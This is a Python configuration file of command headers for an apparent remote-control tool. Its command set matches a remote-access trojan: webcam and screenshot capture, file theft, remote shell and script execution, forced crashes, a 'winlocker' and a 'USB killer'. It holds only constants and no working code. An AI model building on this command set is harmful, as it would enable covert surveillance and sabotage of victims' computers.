"""
Configuration file.
This file contains remote-control headers for fast and convenient command response:
    HD_START: [THIS LIST CONTAINS ALL VARIATIONS OF COMMAND] => ["Start", "Test", "S", etc.]

VARIABLE TAG RULES:
    HD (HEADER) - variable with this tag contains command header
    HDDL (HEADERS DATA LIST) :only dict: - variable with this tag contains headers and commands attached to them.
    _DEV - dev tools
"""

# All remote-desktop headers.
# Header == Function

HD_GET_USES = "GET_USERS"
HD_GET_COMPUTER_NAME = "GET_COMPUTER_NAME"
HD_GET_CURRENT_SYSTEM_USER = "GET_SYSTEM_USER"
HD_GET_ACTIVE_WINDOW_TITLE = "GET_ACTIVE_WINDOW_TITLE"
HD_GET_ALL_TITLES = "GET_ALL_TITLES"
HD_GET_ACTIVE_PROCESSES = "GET_ACTIVE_PROCESSES"
HD_GET_PLATFORM = "GET_PLATFORM"
HD_GET_LOG_FILE = "GET_LOG_FILE"
HD_GET_SETUP_FILE = "GET_SETUP_FILE"
HD_GET_SCREENSHOT = "GET_SCREENSHOT"
HD_GET_WEBCAM = "GET_WEBCAM"
HD_GET_API_LOG = "GET_API_LOG"
HD_GET_FILE = "GET_FILE"
HD_CALL_BSOD = "CALL_BSOD"
HD_CALL_SHUTDOWN = "CALL_SHUTDOWN"
HD_CALL_RESTART = "CALL_RESTART"
HD_CALL_EXIT_USER = "CALL_EXIT_USER"
HD_SET_SETUP_FILE = "SET_SETUP_FILE"
HD_SYNTH_SPEECH = "SYNTH_SPEECH"
HD_SERVER_RESTART = "SERVER_RESTART"
HD_STOP = "SERVER_STOP"
HD_OPEN_URL = "OPEN_URL"
HD_FIND_PROCESS = "FIND_PROCESS"
HD_BLOCK_PROCESS = "BLOCK_PROCESS"
HD_TERMINATE_PROCESS = "TERMINATE_PROCESS"
HD_UPDATE = "SERVER_UPDATE"
HD_SHELL_EXECUTE = "SERVER_SHELL_EXECUTE"
HD_DISPLAY_OFF = "DISPLAY_OFF"
HD_DISPLAY_ON = "DISPLAY_ON"
HD_OPEN_CD = "OPEN_CD"
HD_BLOCK_MOUSE = "MOUSE_BLOCK"
HD_MOUSE_TRACER = "MOUSE_TRACER"
HD_USB_KILLER = "USB_KILLER"
HD_ALERT = "ALERT"
HD_WINLOCKER = "WINLOCKER"
HD_EXECUTE_SCRIPT = "SERVER_EXECUTE_SCRIPT"
HD_TEST_DEV = "DEV_TEST"

HDDL_MAIN = {
    HD_GET_USES: [],
    HD_GET_COMPUTER_NAME: [],
    HD_GET_CURRENT_SYSTEM_USER: [],
    HD_GET_ACTIVE_WINDOW_TITLE: [],
    HD_GET_ALL_TITLES: [],
    HD_GET_ACTIVE_PROCESSES: [],
    HD_GET_PLATFORM: [],
    HD_GET_LOG_FILE: [],
    HD_GET_SETUP_FILE: [],
    HD_GET_SCREENSHOT: [],
    HD_GET_WEBCAM: [],
    HD_GET_API_LOG: [],
    HD_GET_FILE: [],
    HD_CALL_BSOD: [],
    HD_CALL_SHUTDOWN: [],
    HD_CALL_RESTART: [],
    HD_CALL_EXIT_USER: [],
    HD_SET_SETUP_FILE: [],
    HD_SYNTH_SPEECH: [],
    HD_SERVER_RESTART: [],
    HD_STOP: [],
    HD_OPEN_URL: [],
    HD_FIND_PROCESS: [],
    HD_TERMINATE_PROCESS: [],
    HD_UPDATE: [],
    HD_SHELL_EXECUTE: [],
    HD_DISPLAY_ON: [],
    HD_DISPLAY_OFF: [],
    HD_OPEN_CD: [],
    HD_BLOCK_MOUSE: [],
    HD_MOUSE_TRACER: [],
    HD_USB_KILLER: [],
    HD_ALERT: [],
    HD_WINLOCKER: [],
    HD_EXECUTE_SCRIPT: [],
    HD_TEST_DEV: ["start"]
}